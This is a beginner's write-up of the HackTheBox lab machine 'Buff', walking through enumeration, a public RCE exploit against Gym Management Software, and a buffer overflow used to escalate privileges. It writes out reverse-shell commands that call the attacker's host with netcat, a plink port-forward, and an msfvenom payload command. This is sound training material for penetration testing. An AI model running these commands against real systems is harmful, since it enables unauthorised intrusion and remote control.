Buff (HTB)

first hackthebox machine :) I've been loyal to tryhackme for awhile but it's time to expand my learning resources

HackTheBox Buff Write-Up

topics: web application security, Windows Privilege Escalation, port forwarding, public exploits, buffer overflows

  1. Enumeration

  2. Local Privilege Escalation

  3. System Privilege Escalation

new tools: plink

tools: nmapAutomator, dirsearch, searchsploit, curl, python, msfvenom

Enumeration

initial nmap scan ./nmapAutomator.sh $ip Basic

We have one port (8080 http alt) open running an Apache server, a Win64 version with implementation 2.4.43. We can see the http-title is mrb3n's Bro Hut, we can assume that mrb3n is a potential username. Lets run a vulnerability scan and visit the homepage.

./nmapAutomator.sh $ip Vulns

python3 dirsearch.py -u $ip -e php,html,txt

There are several subdirectories that are not visible on the homepage, including places like upload.php and register.php, insinuating locations to potentially upload a shell. I didn't find anything on my initial inspection of the visible tabs on the homepage, so lets visit some of these pages.

I visited upload.php first, as it could potentially be the fastest way to achieve a shell.

There is an error message on this page. It says it doesn't recognize the parameter id in the page source code. This could be an LFI vulnerability or allow us to upload a file of our choosing. We know the server hosting the website is Apache, lets attempt to find what platform the website was built with to get more information.

Checking the main tabs on the homepage one more time, on the contact.php page we see the following message.

Local Privilege Escalation

Lets use searchsploit to search for Gym Management Software

Inspecting the python file reveals the following RCE vulnerability

python /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

The exploit works by tricking the server into uploading an image extension (PNG) by manipulating the Content-Type in the GET request. What the python program actually does is use PHP to fetch the system shell, which is executed as a PNG extension. We'll have to upgrade to a secure shell.

The exploit lists the parameter /upload/kamehameha.php?telepathy= to interact with the shell to execute commands. Lets attempt to place a netcat executable and send cmd back with the URL.

On the attacker, copy the nc.exe executable to the working directory, start a python server. On the victim download nc.exe with curl and output the file to nc.exe. Listen for the shell on the desired port and enter "http://10.10.10.198:8080/upload/kamehameha.php?telepathy= nc.exe 10.10.15.16 4445 -e cmd.exe" in the URL.

Administrator Privilege Escalation

Lets find out the CPU architecture of the machine in order to transfer and run winPEAS.

wmic OS get OSArchitecture

We are unable to transfer the file with smbserver, lets try certutil

Our two main methods of transferring files on Windows machines is disabled. Lets try and enumerate the user folders for something immediate before trying to run a privesc script.

There is nothing else in the Desktop folder besides the user flag. There was a batch file in the Documents folder but based on the message, I'm assuming it's necessary for the website platform.

There is an executable file in the Downloads folder, checking the syntax with searchsploit immediately reveals a buffer overflow exploit.

The exploit is written in python but python is not installed on the victim. In order to use this exploit, we'll have to port forward on our local machine. We can use the tool plink to do this (the default plink on kali is outdated). Transfer the windows executable from Kali with the original shell and run the command

plink.exe -l kali -pw kali 10.10.15.16 -R 8888:127.0.0.1:8888

The payload provides the msfvenom command to create a custom payload. We have a netcat executable on the machine already, lets use that in place of CMD.

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.15.16 4444' -b '\x00\x0a\x0d' -f py -v payload

Replace the payload section of 48389.py with the above output, listen for the shell and run the exploit

Last updated